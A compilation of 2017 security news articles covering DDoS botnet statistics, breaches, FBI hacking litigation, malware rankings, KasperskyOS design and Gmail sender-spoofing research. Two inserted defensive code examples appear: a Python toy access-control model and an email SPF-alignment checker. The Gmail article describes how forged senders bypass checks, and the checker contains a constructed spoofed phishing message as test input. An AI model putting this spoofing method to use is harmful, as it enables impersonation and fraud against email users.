In Q4, the highest number of C&C servers (59.06%) was detected in South Korea. Although the country’s contribution increased by 13.3 p.p. from the previous quarter, it is much less than in Q2 2016 (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China (8.72%) and the US (8.39%). Their total share accounted for 76.1%, which is an increase of 8.4 p.p. compared to Q3.

In the fourth quarter, three Western European countries – the Netherlands (7.4%), the UK (1.3%), and France (1.7%) – remained in the Top 10 after entering it back in Q3. Among the newcomers to the C&C rating were Bulgaria (6%) and Japan (1.3%).

 

Distribution of botnet C&C servers by country in Q4 2016

When it came to the distribution of operating systems in Q4, Linux-based DDoS bots remained the clear leader, although their share decreased by 2.2 p.p., accounting for 76.7%. This correlates with the decline in popularity of SYN DDoS for which Linux bots are the most appropriate tool.

The growing popularity of IoT devices used for DDoS attacks suggests that in 2017 the balance will shift further towards Linux, since most Internet-connected devices are based on this operating system.

 

Correlation between attacks launched from Windows and Linux botnets, Q3 and Q4 2016

The majority of attacks – 99.7% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.3% of cases.

Conclusions and forecasts

We expect the share of amplification-type attacks in 2017 to continue to decrease, especially the most popular types (DNS, NTP). However, considering the simplicity and low organizational costs, the technique may be used in some less popular protocols suitable for amplification (RIP, SSDP, LDAP and so on), though it is unlikely that such attacks will be very effective.

The number and complexity of attacks on applications will continue to grow. Considering the renewed interest in this type of attack among cybercriminals and the stagnation in this segment over the last few years, we can assume that older botnets will gradually fall out of use and something new will appear, for example, botnets capable of more sophisticated attacks. The trend for encryption in attacks on applications will remain.

WordPress Pingback attacks will remain popular. Although in the newer versions of the WordPress CMS the vulnerability used for organizing such attacks (namely, the default Pingback function in older CMS versions) has long since been patched by the developers, there are still many vulnerable hosts on the Internet. Of course, their number will decline over time, reducing the number and power of WordPress Pingback attacks. But the relative simplicity and low cost of organizing such attacks, as well as the possibility of using encryption, makes WordPress Pingback-type attacks attractive to less demanding cybercriminals.

Botnets based on IoT devices will continue to grow. This is largely due to both the novelty of the IoT concept in general and exploitation of IoT devices by cybercriminals. We can assume that in the fourth quarter of 2016 we only saw the emergence of this new market segment, and in 2017 it will continue to grow and develop. The potential growth is difficult to estimate: until now IoT-device manufacturers were not particularly concerned about protecting their products. Even if we assume that all new IoT devices entering the market are perfectly protected from malicious attacks (which in itself is quite doubtful), the current volume of vulnerable IoT devices with Internet access is considerable. Just a few months after the initial appearance of the concept, attackers were able to demonstrate the use of botnets of unprecedented size and conduct attacks whose power was previously only considered possible in theory. Moreover, these devices have the potential to launch attacks of any complexity – the current trend is attacks on applications, including the use of encryption. Considering the highly effective nature and huge potential of IoT-based attacks, we can predict an increase in the number of such attacks as well as their volume and complexity in 2017.


Sports Direct hacked but it still hasn’t disclosed the breach to its staff
12.2.2017

Sports Direct, the UK’s largest sports retail business, was hacked last year, and still hasn’t disclosed the incident to its staff.
The Register confirmed that Sports Direct, the UK’s largest sports retail business, was hacked last year and still hasn’t disclosed the incident to its staff.

In the autumn a hacker broke into the internal systems of the company and accessed personal information of its staffers, including names, email and postal addresses, as well as phone numbers.

The attackers exploited known vulnerabilities affecting the unpatched version of the DNN platform used by Sports Direct to host its staff portal.


According to an inside source with knowledge of the data breach, staff data were stored in plain text. Sports Direct discovered the security breach in September; the insider claimed the attacker left a phone number on the company’s internal website so that the business could get in touch.

According to El Reg, Sports Direct still has not disclosed the data breach to its staff, although the company filed an incident report with the Information Commissioner’s Office after it became aware of the intrusion.

“A spokesperson for the ICO confirmed to The Register that it was “aware of an incident from 2016 involving Sports Direct” and would be “making enquiries.”” reported The Register.

“Sports Direct workers will be anxious to know what personal details have been hacked in this apparently serious data breach and why they weren’t immediately informed about it by their employer. This is potentially sensitive and personal information.” the Unite assistant general secretary Steve Turner told The Register.

“It’s completely unacceptable that the workers affected appear not to have been informed and the data breach swept under the carpet,”

“We will be immediately approaching the company for answers and further details about the potentially damaging impact of this on our members, as well as details about actions taken to ensure personal data is never compromised again,” the union’s assistant general secretary said. “In the meantime we would urge Sports Direct workers to check their financial records, change passwords and immediately report any suspicious activity.”

What was Sports Direct’s reply?

“We cannot comment on operational matters in relation to cyber-security for obvious reasons. However, it is our policy to continually upgrade and improve our systems, and where appropriate we keep the relevant authorities informed.” said a company spokesman.


Privacy groups claim FBI hacking operation in the PlayPen case was unconstitutional
11.2.2017 securityaffairs BigBrothers

According to privacy groups, the FBI search warrant used to hack into thousands of computers around the world in the PlayPen case was unconstitutional.
Privacy groups are claiming the FBI hacking campaign against the Playpen child pornography community violated international law.

According to the court documents, the FBI monitored a Tor hidden service bulletin board named Playpen, launched in August 2014 and mainly used for “the advertisement and distribution of child pornography.”

The Playpen hidden service reached over 200,000 users in one year, with over 117,000 total posts mainly containing child pornography content. Law enforcement discovered nearly 1,300 IP addresses belonging to the visitors.


According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina, and law enforcement then kept the server running in order to track its visitors. The agents used a network investigative technique (NIT) to obtain the IP addresses of the Playpen users.

The Feds hacked 8,700 computers in 120 countries on the basis of a single warrant, a procedure considered unconstitutional by privacy advocates. US law enforcement expanded its extraterritorial surveillance capabilities without the consent of the states hosting the computers targeted by its malware.

“The FBI’s hacking operation in this case represents an enormous expansion of its extraterritorial surveillance capabilities — affecting thousands of computers in over a hundred countries around the world.” wrote Scarlet Kim, a legal officer with U.K.-based Privacy International. “How will other countries react to the FBI hacking in their jurisdictions without prior consent?”

What if a foreign intelligence agency or law enforcement body had carried out a similar hacking operation that compromised the computers of US citizens?

Last week, the U.K.-based Privacy International group, the Electronic Frontier Foundation (EFF) and the American Civil Liberties Union of Massachusetts, filed briefs in a lawsuit involving the FBI’s Playpen investigation.

The privacy groups filed briefs in a case involving Alex Levin, who is one of the suspects in the FBI’s Playpen investigation that was identified by the Feds thanks to the NIT (Network investigative technique).

The privacy advocates claim that the single warrant used by the FBI to conduct the hacking operations is not valid.

According to the EFF and ACLU groups, the warrant was invalid because the U.S. Constitution prohibits this kind of search on US citizens.

“No one questions the need for the FBI to investigate serious crimes like child pornography. But even serious crimes can’t justify throwing out our basic constitutional principles. Here, on the basis of a single warrant, the FBI searched 8,000 computers located all over the world,” EFF attorney Mark Rumold wrote in a blog post. “If the FBI tried to get a single warrant to search 8,000 houses, such a request would unquestionably be denied.”

The EFF considers the use of a single warrant to hack into such a huge number of computers across the world unconstitutional.

On the other side, U.S. attorneys believe the Feds followed proper procedures in obtaining the warrant and that there was no other way to unmask the criminals involved in the PlayPen case.


Kelihos becomes January’s Top 10 ‘Most Wanted’ Malware
11.2.2017 securityaffairs Virus

The infamous Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
Which are the most active malware in the wild?

According to research conducted by Check Point Security, the malware landscape was characterized by some interesting changes in this first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Surprisingly, the eight-year-old malware Conficker remained one of the most active malware families in 2016.

In June 2016, researchers at Check Point described Conficker as “the most prominent family accounting for 14 percent of recognized attacks.” Recall the Conficker resurgence in 2015, when samples of the malware infected police body cameras.

Below is January’s Top 10 ‘Most Wanted’ Malware published by Check Point Security:

Kelihos – Botnet mainly involved in bitcoin theft and spamming. It utilizes peer-to-peer communications, enabling each individual node to act as a Command & Control server
HackerDefender – User-mode Rootkit for Windows, can be used to hide files, processes and registry keys, and also implements a backdoor and port redirector that operates through TCP ports opened by existing services. This means it is not possible to find the hidden backdoor through traditional means.
Cryptowall – Ransomware that started as a Cryptolocker doppelgänger, but eventually surpassed it. After the takedown of Cryptolocker, Cryptowall became one of the most prominent ransomwares to date. Cryptowall is known for its use of AES encryption and for conducting its C&C communications over the Tor anonymous network. It is widely distributed via exploit kits, malvertising and phishing campaigns.
Conficker – Worm that allows remote operations and malware download. The infected machine is controlled by a botnet, which contacts its Command & Control server to receive instructions.
Nemucod – JavaScript or VBScript downloader which is commonly used to download ransomware variants or other malicious payloads.
RookieUA – Info Stealer designed to extract user account information such as logins and passwords and send them to a remote server.
Nivdort – Multipurpose bot, also known as Bayrob, that is used to collect passwords, modify system settings and download additional malware. It is usually spread via spam emails with the recipient address encoded in the binary, thus making each file unique.
Zeus – Banking Trojan that uses man-in-the-browser keystroke logging and form grabbing in order to steal banking information.
Ramnit – Banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.
Necurs – Botnet used to spread malware by spam emails, mainly Ransomware and Banking Trojans.
Recently the Kelihos malware was observed spreading via infected thumb drives. The third Most Wanted malware in January was CryptoWall, a well-known ransomware, the remaining positions in the Top 10 list are occupied by other botnets mainly involved in the distribution of the dreaded Locky ransomware.

Check Point also observed changes in the mobile threat landscape: the Android Triada modular backdoor remains the most advanced mobile malware in the Top 3 Most Wanted mobile threats. In second place is HummingBad; CERT-EU and other sources corroborated Check Point researchers’ findings that a new variant of the big-money ad-fraud malware HummingBad is spreading rapidly on the Android marketplace Google Play.

HummingBad was first seen almost a year ago, in January/February 2016, released by the malware authors Yingmob, and it raked in upwards of approximately $300,000 USD per month for the better part of 2016. Approximately 10 million Android devices were infected in the first part of last year.

Now a new variant, dubbed “HummingWhale” by Check Point, is at large with better ad-fraud capabilities and more sophisticated techniques than HummingBad; it affects several applications that together have been downloaded several million times.


The third mobile malware threat is Hiddad, a strain of Android malware that repackages legitimate apps and then releases them to a third-party store.

Below the Top 3 ‘Most Wanted’ mobile malware:

Triada – Modular Backdoor for Android which grants super-user privileges to downloaded malware and helps it to get embedded into system processes. Triada has also been seen spoofing URLs loaded in the browser.
Hummingbad – Android malware that establishes a persistent rootkit on the device, installs fraudulent applications, and with slight modifications could enable additional malicious activity such as installing a key-logger, stealing credentials and bypassing encrypted email containers used by enterprises.
Hiddad – Android malware which repackages legitimate apps and then released them to a third-party store. Its main function is displaying ads, however it is also able to gain access to key security details built into the OS, allowing an attacker to obtain sensitive user data.


Features of secure OS realization
11.2.2017 Kaspersky OS

There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.

Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:

The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.

The provision of guarantees that the system will work securely and will not be compromised.

Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.

To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.

Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.

Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.

Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed on architectural principles that can ensure secure behavior meeting the requirements of special-purpose systems.

However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.

If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.

For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, and OpenVMS, AS/400.

Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.

This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.

The development model of the KasperskyOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system to the specific needs of a particular deployment, while maintaining the verifiability of its security properties.

The first step towards creating a modular operating system is using a microkernel-based architecture. The microkernel is the system’s only method of interaction and data exchange, providing total access control.

However, access control provided by the microkernel alone cannot implement properties of the system related to supporting specific security policies. KasperskyOS applies the principle of separating the access decision (whether an operation is allowed under the defined policy) from access enforcement, which is implemented at the microkernel level. Access decisions, in the form of security policy compliance verdicts, are computed by a dedicated component – the security server. Flask is the best known architecture based on this principle.

It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.

KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.

The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.

As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).

The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.

The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).
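The decision/enforcement split described above can be modelled in a few dozen lines. The following is an added example, not KasperskyOS code and not the Flask reference implementation: a security server computes verdicts by running the basic policies bound to an operation, an object manager standing in for the microkernel enforces every interaction, and a build step resolves a configuration of policy names into references only, so the compiled binding carries nothing but references to policies and operations. The process classes, object types, policies and paths are constructed for the illustration.

```python
"""Toy model of a Flask-style security server / object manager split with a
compiled policy configuration. Added example; the subjects, objects, policy
names and paths below are constructed and do not describe any real system."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class Subject:
    name: str
    cls: str    # process class referenced by the configuration
    level: int  # clearance used by the mandatory policies


@dataclass(frozen=True)
class Object:
    name: str
    otype: str  # object type referenced by type enforcement
    level: int  # classification used by the mandatory policies


Policy = Callable[[Subject, Object, str], bool]


# Basic security policies: each one decides a single concern.
def no_read_up(s: Subject, o: Object, op: str) -> bool:
    """Mandatory confidentiality: reads are allowed only at or below the clearance."""
    return op != "read" or s.level >= o.level


def no_write_down(s: Subject, o: Object, op: str) -> bool:
    """Mandatory confidentiality: writes may not flow to a lower classification."""
    return op != "write" or s.level <= o.level


# Type enforcement: an explicit (process class, object type, operation) allow list.
TE_ALLOW = {("sensor", "log", "write"), ("net", "file", "read"), ("net", "log", "read")}


def type_enforcement(s: Subject, o: Object, op: str) -> bool:
    return (s.cls, o.otype, op) in TE_ALLOW


POLICIES: Dict[str, Policy] = {
    "no_read_up": no_read_up,
    "no_write_down": no_write_down,
    "type_enforcement": type_enforcement,
}

# Configuration (stands in for a configuration language): which basic policies
# govern which operation of which process class. Names only, no logic.
CONFIG: Dict[Tuple[str, str], List[str]] = {
    ("sensor", "write"): ["type_enforcement", "no_write_down"],
    ("net", "read"): ["type_enforcement", "no_read_up"],
}


def compile_config(config, policies) -> Dict[Tuple[str, str], Tuple[Policy, ...]]:
    """Resolve policy names to references; an unknown name fails at build time (KeyError)."""
    return {key: tuple(policies[name] for name in names) for key, names in config.items()}


class SecurityServer:
    """Computes verdicts; it never touches the objects themselves."""

    def __init__(self, compiled):
        self.compiled = compiled

    def verdict(self, s: Subject, o: Object, op: str) -> bool:
        chain = self.compiled.get((s.cls, op))
        if chain is None:
            return False  # default deny: an unconfigured operation is simply unsupported
        return all(policy(s, o, op) for policy in chain)


class ObjectManager:
    """Enforcement point (the microkernel role): every interaction passes through here."""

    def __init__(self, server: SecurityServer):
        self.server = server
        self.audit: List[Tuple[str, str, str, bool]] = []

    def perform(self, s: Subject, o: Object, op: str) -> str:
        allowed = self.server.verdict(s, o, op)
        self.audit.append((s.name, o.name, op, allowed))
        if not allowed:
            raise PermissionError(f"{s.name} may not {op} {o.name}")
        return f"{op} on {o.name} by {s.name}"


def build_system() -> ObjectManager:
    return ObjectManager(SecurityServer(compile_config(CONFIG, POLICIES)))


def demo() -> Dict[Tuple[str, str, str], bool]:
    """Run a handful of constructed requests and report which were allowed."""
    om = build_system()
    sensor = Subject("sensor0", "sensor", 0)
    netd = Subject("netd", "net", 0)
    log = Object("/var/log/app", "log", 0)
    manual = Object("/srv/manual.txt", "file", 0)
    keys = Object("/etc/keys", "file", 2)
    requests = [(sensor, log, "write"), (netd, manual, "read"),
                (netd, keys, "read"), (netd, log, "exec")]
    results = {}
    for s, o, op in requests:
        try:
            om.perform(s, o, op)
            results[(s.name, o.name, op)] = True
        except PermissionError:
            results[(s.name, o.name, op)] = False
    return results


if __name__ == "__main__":
    for request, allowed in demo().items():
        print(request, "allowed" if allowed else "denied")
```

Two properties of the article's design show up directly: the read of `/etc/keys` is refused by the mandatory policy even though type enforcement would permit it, and the `exec` request is refused without consulting any policy because the configuration never mentioned it, which is the default-deny behaviour of a security subsystem that only contains what a deployment needs.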

Of course, a microkernel-based system that has Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that can guarantee security domain isolation (provide “security through isolation”) – an architecture known as MILS (Multiple Independent Domains of Safety/Security).

However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.

KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.

The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.

This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose OS can inherit the security properties of the host OS.

KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.

To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.


Gmail Delivers Spoofed Messages Without Warning, Researchers Find

11.2.2017 securityweek Security
Spoofed emails could easily land in users’ Gmail inboxes without any warning of suspicious activity, security researchers have discovered.

While spam is normally used to deliver malicious documents or links to unsuspecting users, spoofed emails have a bigger chance of luring potential victims, because they are likely to click on a link or open a document coming from what they believe is a trusted contact. When it comes to spoofed messages, the sender is impersonated or changed to another, thus making messages appear legitimate.

While users may expect Gmail to warn them of such suspicious activity, researchers at Morphus Segurança da Informação recently discovered that this doesn’t always happen. According to them, users should revise the trust they place in Gmail blocking messages with spoofed senders, even when no alert is displayed regarding the legitimacy of that message.

“We realized that a message that appears in your Gmail inbox folder even with an important sign, coming from one of your Gmail contacts with no spoof or security alert, may have been forged and impersonated by a fraudster or cybercriminal,” Renato Marinho, Director at Morphus Segurança da Informação, explains.

Marinho explains that the Simple Mail Transfer Protocol (SMTP) defines the “mail envelope and its parameters, such as the message sender and recipient,” and not the message content and headers. Thus, an SMTP transaction includes Mail From (which establishes the return address in case of failure), Rcpt To (the recipient address), and Data (a command for the SMTP server to receive the content of the message).

The value “From” displayed in the email is usually equivalent to the value used in the SMTP command “mail from” but, because it is part of the message content, “can be freely specified by the system or person issuing commands to the SMTP server.” Basically, an attacker simply needs to change the “From” to a desired value to spoof the sender, but that is almost certainly going to trigger anti-spam or anti-phishing mechanisms, Marinho explains.

However, attackers could also attempt to send spoofed messages on behalf of a certain domain by changing the “Mail from:” SMTP command as well, a practice that can be combated by applying spoofing protection mechanisms. Among them, SPF (Sender Policy Framework) allows admins to specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of their domain.

To verify whether these protections are effective, the security researchers decided to test the spoofing of Gmail and Yahoo addresses. They discovered that, if the SMTP server’s IP address wasn’t allowed in the SPF policy of their generic domain, the message wouldn’t be delivered. When an SPF policy was in place, however, the message was delivered in Gmail, although Yahoo continued to block it.

Even more surprising, the researcher says, was that the message landed in the Inbox folder, and not in Spam. Further, there was almost no indication that the message wasn’t legitimate, except for a “via [the generic domain]” mention near the sender’s address. This mention, however, appears only in the web interface, but isn’t displayed in the Android or iOS applications.

After successfully spoofing messages between @gmail.com accounts, the researchers attempted to apply the strategy to corporate domains hosted by Google. They discovered not only that the messages were delivered without a warning, but that the spoofed account’s profile picture was also displayed (which could easily add a sense of legitimacy to the message).

“During our experiments, we’ve found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exist on Gmail’s user base. In this situation, unlike the successful scenarios, Gmail forwarded the message to the Spam folder and added a special security alert informing that they could not verify if the message was really sent by gmail.com,” the researcher explains.

To stay protected, users are advised to pay attention to messages in their inbox coming from “@gmail.com” via another server, because such messages should normally be delivered by Gmail itself. They should also have a look at the message details, which are available in the web application by clicking on the “down-arrow” near “to me”. However, a spoofed message is more likely to be noticed if the full header is examined.
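The mechanism described above (SPF authenticates the envelope sender from MAIL FROM, while the displayed From is free content in the DATA section) and the advice to examine the full header both come down to one check: does the domain that SPF actually authenticated match the domain shown to the user? That alignment test is what DMARC standardizes. The following is an added example, not code from the Morphus write-up or from Gmail; it applies the check to raw headers of the kind a receiving MTA records on delivery (`Return-Path`, `Received-SPF`). The two messages, their domains and IP addresses are constructed, and the organizational-domain shortcut is an assumption noted in the code.

```python
"""Check whether a message's visible From address is backed by the SMTP envelope
that SPF authenticated. Added example; samples and domains are constructed."""
from email import message_from_string
from email.utils import parseaddr

# Constructed: the envelope sender is a generic domain whose SPF record authorizes
# the sending server, while the header From claims to be a gmail.com contact.
SPOOFED_SAMPLE = """\
Return-Path: <bounce@generic-example.test>
Received-SPF: pass (google.com: domain of bounce@generic-example.test designates 198.51.100.7 as permitted sender) client-ip=198.51.100.7;
From: Trusted Contact <trusted.contact@gmail.com>
To: victim@gmail.com
Subject: Invoice for January

Please open the attached invoice.
"""

# Constructed: envelope and header domains agree, so the SPF pass covers the From.
LEGIT_SAMPLE = """\
Return-Path: <trusted.contact@gmail.com>
Received-SPF: pass (google.com: domain of trusted.contact@gmail.com designates 209.85.220.41 as permitted sender) client-ip=209.85.220.41;
From: Trusted Contact <trusted.contact@gmail.com>
To: victim@gmail.com
Subject: Lunch?

Still on for Friday?
"""


def _domain(header_value: str) -> str:
    """Lower-cased domain part of an address header value ('' if absent)."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _org_domain(domain: str) -> str:
    """Organizational domain, approximated as the last two labels.
    Assumption: real DMARC relaxed alignment consults the Public Suffix List;
    the two-label shortcut is enough for the sample domains used here."""
    return ".".join(domain.split(".")[-2:])


def assess(raw_message: str) -> dict:
    """Return the envelope/header domains, the SPF result and an alignment verdict."""
    msg = message_from_string(raw_message)
    envelope = _domain(msg.get("Return-Path"))   # MAIL FROM as recorded by the MTA
    visible = _domain(msg.get("From"))           # what the user sees
    spf_header = msg.get("Received-SPF", "")
    spf = spf_header.split()[0].lower() if spf_header else "none"
    aligned = bool(envelope) and _org_domain(envelope) == _org_domain(visible)

    if spf != "pass":
        verdict = "fail: envelope sender not authorized by SPF"
    elif not aligned:
        # SPF passed, but for a different domain than the one displayed: this is
        # exactly the delivered-without-warning case the researchers describe.
        verdict = f"quarantine: SPF pass covers {envelope}, not the displayed {visible}"
    else:
        verdict = "accept: displayed From is covered by SPF"
    return {"envelope_domain": envelope, "from_domain": visible,
            "spf": spf, "aligned": aligned, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(label, assess(sample)["verdict"])
```

The “via [the generic domain]” hint the web interface shows is the same mismatch surfaced to the user; the function above makes it a machine verdict that a mail filter can act on regardless of which client the recipient uses.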

The researchers contacted Google Security team to report the findings, but the bug won’t be tracked as a security issue, it seems. “Although it has not been considered a security bug, in our opinion, it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account,” Marinho says.


Russia suspected over cyber espionage campaign on the Italian foreign ministry
11.2.2017 securityaffairs Cyber
Italian officials speculate Russia was behind a cyber espionage campaign on the Italian foreign ministry that lasted for months.
The Italian Foreign Ministry was the victim of a targeted cyber espionage campaign, according to The Guardian newspaper, which cited a diplomatic source who spoke on condition of anonymity.

According to the source, the attack was launched by a nation-state actor, likely Russia.

“Russia is suspected by Italian officials of being behind a sustained hacking attack against the Italian foreign ministry last year that compromised email communications and lasted for many months before it was detected, according to people familiar with the matter.” reported The Guardian.

The source revealed that after the experts discovered the attack, the foreign ministry introduced further security measures to improve its online “architecture” and its internal security. At the time of writing there is no technical information about the attack, nor about the way the experts discovered the intrusion.

The hackers targeted the foreign ministry’s “field offices”, including embassies and staff members; they used malware to spy on their systems and exfiltrate sensitive information.

“The official did not confirm that Moscow was behind the attack. But two other people with knowledge of the attack said the Russian state was believed to have been behind it. The hacking is now the subject of an inquiry by the chief prosecutor in Rome.” continued The Guardian.

“There were no attacks on the encrypted level. So the information – delicate, sensitive information – that is usually shared in this net, which is restricted by code, has never been attacked or part of this attack,” the government official said.

Security experts believe that the Russian Government is conducting wide-ranging espionage activity in order to gather intelligence on EU states and NATO members; the list of victims includes France, Germany, the Netherlands and Bulgaria.

Recently, French Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warned of hacking campaigns by Russian hackers targeting the upcoming elections.

Back to the present, the Italian source, who has close ties to the Foreign Ministry, confirmed that the cyber espionage campaign “did not affect the encrypted information system used to exchange the most sensitive information” but did affect “email accounts of ministry employees and the embassies”.

An Italian government official confirmed that the cyber attack occurred last spring, when Paolo Gentiloni was serving as foreign minister, and that the campaign lasted for more than four months. The official added that the hackers did not infiltrate the encrypted system used for classified communications, nor Gentiloni’s account.

Paolo Gentiloni, the Italian prime minister who was serving as foreign minister at the time, was not affected by the cyber attack. The version provided by the Italian official, who explained that Gentiloni avoided using email while he was foreign minister, is very strange.

If true, what channel did Prime Minister Gentiloni use? Why did he avoid using the government email, which is monitored by government IT staff?

Russia’s foreign ministry denied involvement in the attack and said there were “no facts to prove this claim.”

I fear that other nation-state actors may also have breached our systems; Chinese hackers, the North Korean cyber army and Iranian hackers are other actors that have to be monitored carefully.


Kelihos Becomes King of the Malware Mountain

11.2.2017 securityweek Virus
The beginning of 2017 has brought a series of changes on the malware charts, as the Kelihos botnet managed to climb to the top position, while the Conficker worm dropped to fourth on the list.

An eight-year-old threat, Conficker managed to remain one of the most active malware families out there last year, although it didn’t make the headlines as often as other threats. In 2015, however, the malware briefly returned to the spotlight after security researchers found that it had infected police body cameras.

Check Point’s latest threat report shows that Conficker is now the fourth most active malware out there, with Kelihos, HackerDefender, and Cryptowall occupying the first three positions. Conficker was the top threat in the security firm’s Top 10 “Most Wanted” malware list for quite some time.

The current leader, Kelihos, is yet another long-standing threat, one that managed to withstand several takedown attempts. In August last year, Kelihos infections registered a spike and the botnet tripled in size overnight, a clear sign that the actors behind it were considering ramping up activity. The botnet uses peer-to-peer communications, with each individual node acting as a command and control center.

Although the botnet was focused mainly on spamming stock pump-and-dump schemes or pharmaceutical scams, it was seen dropping malware as well, including ransomware such as MarsJoke, Wildfire, and Troldesh, as well as Trojans, including Panda Zeus, Nymaim and Kronos. Most recently, security researchers observed that Kelihos was also capable of infecting removable USB drives to spread to new hosts.

The second top malware family is the HackerDefender user-mode rootkit for Windows, which can be used to hide files, processes and registry keys, as well as to implement a backdoor and port redirector. The third Most Wanted malware in January was CryptoWall, a piece of file-encrypting ransomware that uses AES encryption and the Tor anonymity network.

Nemucod (JavaScript or VBScript downloader), RookieUA (info stealer), Nivdort (multipurpose bot also known as Bayrob), Zeus (banking Trojan), Ramnit (banking Trojan), and Necurs (spam botnet mainly associated with the distribution of Locky) round out the Top 10 Most Wanted malware list.

